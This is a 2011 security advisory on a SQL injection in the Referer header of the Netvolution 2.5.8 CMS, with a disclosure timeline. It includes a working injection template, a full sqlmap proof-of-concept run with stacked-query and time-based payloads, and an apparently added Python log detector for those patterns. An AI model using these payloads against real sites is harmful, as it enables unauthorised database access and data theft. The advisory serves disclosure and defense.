Affected Products: Netvolution v2.5.8 (ASP). Other versions may also be vulnerable.
Class: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89)
Discovered by: Patroklos Argyroudis
Researched and Exploited by: Dimitris Glynos
Netvolution is a commercial content management system by ATCOM S.A. with a large number of installations, most of them belonging to Greek companies and organizations.
It appears that the Netvolution platform has both ASP and PHP implementations. This advisory concerns a bug found in the ASP implementation (version 2.5.8). We were unable to verify with the vendor if this bug also affects other versions of the ASP (or PHP) codebase.
The bug is located in the code that parses the "HTTP Referer" header value. An attacker may inject arbitrary SQL commands into the Netvolution database by using a "Referer" header like the following:
Referer: 1','0'); SQL
In the above example “SQL” is a placeholder; the attacker would replace this with the SQL commands to be executed by the database. The CMS does not provide feedback on the output of the SQL commands but collection of this output is still possible through “blind” SQL Injection techniques.
The following Proof of Concept shows sqlmap mounting a blind SQL injection attack on a vulnerable website and retrieving the database banner:
```
user@host:~/sqlmap$ ./sqlmap.py -u \
    'http://site.com/default.asp?pid=45&la=1&nid=100&ny=2011' -p referer \
    --referer="1','0'); " -b

    sqlmap/1.0-dev (r4379) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:01:55

[11:01:56] [WARNING] the testable parameter 'referer' you provided is not inside the GET
[11:01:56] [INFO] using '/home/user/sqlmap/output/site.com/session' as session file
[11:01:56] [INFO] testing connection to the target url
[11:01:57] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[11:01:57] [WARNING] the testable parameter 'referer' you provided is not inside the Cookie
[11:01:57] [INFO] testing if the url is stable, wait a few seconds
[11:01:59] [INFO] url is stable
[11:01:59] [INFO] testing if Referer parameter 'Referer' is dynamic
[11:01:59] [WARNING] Referer parameter 'Referer' appears to be not dynamic
[11:02:00] [INFO] heuristic test shows that Referer parameter 'Referer' might be injectable (possible DBMS: Microsoft SQL Server)
[11:02:00] [INFO] testing sql injection on Referer parameter 'Referer'
[11:02:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[11:02:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:02:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:02:31] [INFO] Referer parameter 'Referer' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[11:02:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:02:43] [INFO] Referer parameter 'Referer' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[11:02:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
Referer parameter 'Referer' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 33 HTTP(s) requests:
---
Place: Referer
Parameter: Referer
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: 1','0'); ; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: 1','0'); WAITFOR DELAY '0:0:5'--
---

[11:02:58] [INFO] testing Microsoft SQL Server
[11:02:59] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[11:03:04] [INFO] confirming Microsoft SQL Server
do you want to adjust the time delay to 3 seconds (due to good response times)? [Y/n] Y
[11:03:41] [INFO] the back-end DBMS is Microsoft SQL Server
[11:03:41] [INFO] fetching banner
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS operating system: Windows 2003 Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.5057.00 (Intel X86)
    Mar 25 2011 13:50:04
    Copyright (c) 1988-2005 Microsoft Corporation
    Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---

[11:58:52] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 21 times
[11:58:52] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/site.com'

[*] shutting down at 11:58:52
```
Although Netvolution has been found to be vulnerable to numerous injection attacks in the past (1, 2, 3), this particular bug is especially interesting because it manifests itself in an HTTP header field. As header field values are sometimes not included in HTTP transaction logs, an attack based on this vulnerability may go unnoticed by web server administrators.
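The logging caveat above is the detection problem: if the Referer header is not written to the access log, nothing on the server records the attempt. The following detector is an added example (not from the advisory or the vendor) that reads IIS W3C extended log lines, first checks whether `cs(Referer)` is logged at all, and then flags Referer values shaped like the advisory's payload (`1','0'); <SQL>`) or carrying the `WAITFOR DELAY` probe sqlmap used. The log lines are constructed for illustration.

```python
"""Flag Referer-header SQL injection attempts in IIS W3C extended log files."""
import re
from urllib.parse import unquote_plus

# Referer values that close a string literal and a VALUES list and then start a
# stacked statement (the advisory's "1','0'); <SQL>" shape), or that carry the
# time-based probe seen in the sqlmap run above.
INJECTION_PATTERNS = [
    re.compile(r"'\s*\)\s*;"),                       # ...'); <next statement>
    re.compile(r"\bWAITFOR\s+DELAY\b", re.IGNORECASE),
]


def parse_w3c(lines):
    """Yield one dict per log entry, naming columns from the #Fields directive."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue                                  # other directives / blanks
        if fields is None:
            raise ValueError("log entry seen before a #Fields directive")
        yield dict(zip(fields, line.split()))


def find_referer_injections(lines):
    """Return (referer_logged, findings); findings are (c-ip, uri, referer)."""
    referer_logged = False
    findings = []
    for row in parse_w3c(lines):
        if "cs(Referer)" not in row:
            continue                                  # header not logged: blind spot
        referer_logged = True
        # IIS writes spaces inside a field as '+', so decode before matching.
        referer = unquote_plus(row["cs(Referer)"])
        if referer != "-" and any(p.search(referer) for p in INJECTION_PATTERNS):
            findings.append((row.get("c-ip", "?"), row.get("cs-uri-stem", "?"), referer))
    return referer_logged, findings


# Constructed sample log (not real traffic): one benign request, then one that
# carries the advisory's payload shape in its Referer header and hits a 500.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2011-10-03 11:02:31 203.0.113.5 GET /default.asp pid=45&la=1 200 http://www.example.com/
2011-10-03 11:02:32 198.51.100.9 GET /default.asp pid=45&la=1 500 1','0');+WAITFOR+DELAY+'0:0:5'--
""".splitlines()

if __name__ == "__main__":
    print(find_referer_injections(SAMPLE_LOG))
```

When `referer_logged` comes back `False`, the log format itself needs fixing before any detection can work, which is the gap the advisory warns about.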
The vendor has responded to this advisory with an update to the CMS software. Administrators of Netvolution websites must check with the software vendor to ensure that they are running a non-vulnerable version of the CMS.
CVE assignment: August 30th, 2011
Vendor Contact(s): August 31st, 2011; September 1st, 2011; September 27th, 2011
Public Disclosure: October 3rd, 2011